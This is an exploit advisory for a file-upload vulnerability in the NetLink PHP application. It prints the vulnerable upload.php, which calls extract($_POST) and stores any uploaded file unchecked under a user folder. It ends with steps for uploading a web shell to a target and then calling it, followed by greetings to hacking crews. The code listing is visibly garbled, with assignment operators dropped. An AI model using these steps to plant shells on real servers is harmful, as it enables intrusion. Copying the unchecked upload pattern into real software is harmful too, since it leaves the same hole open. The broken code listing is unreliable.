NetLink Arbitrary File Upload Vulnerability



======================================

NetLink Remote Arbitrary File Upload Vulnerability
Download: http://sourceforge.net/projects/kp-netlink/
by lumut--
Homepage: lumutcherenza.biz
======================================

[upload.php]

<?php
extract
($_POST);
if (
$submit)
{
  
$file_name=$_FILES['filename']['name'];
    
$file_type=$_FILES['filename']['type'];
    
$file_tmp=$_FILES['filename']['tmp_name'];
    
$file_size=$_FILES['filename']['size'];

    
$user=$_SESSION['login'];
    echo 
"Upload Stats:<br/>";
    echo 
"<blockquote style='font-size:10pt;'>";
    echo 
"Filename: ".$file_name;
    echo 
"<br/>File Type: ".$file_type;
    echo 
"<br/>File Size: ".$file_size;

    
#now that the stats have been declared & displayed, now we process and
upload the file
    $file_dest 
"Users/$user/";
    
$file_dest $file_dest $_FILES['filename']['name'];

    echo 
"<br/><br/>Copying $file_name....";
    echo 
"<br/>Moving copied file to $user's account...";
    echo 
"</blockquote>";
    if (
move_uploaded_file($_FILES['filename']['tmp_name'], $file_dest))
          print 
"File '$file_name' was successfully uploaded to account
<b>
$user</b>.<br/> ";
    else
    {
      print 
"Possible file upload attack!  Here's some debugging info:\n";
      
print_r($_FILES);
    }
    
touch("Users/$user/$file_name");
include(
"options.php");
echo 
"<hr color='#000000'/>";
}

?>


expl: http://[target]/[netlink_path]/upload.php
shell: http://[target]/[netlink_path]/Users/yourshell.php

======================================================================

thx to : cr4wl3r, Team_elitE, kisame, aNtI_hAcK, kazuya, PunkRock and
manadocoding team :D
======================================================================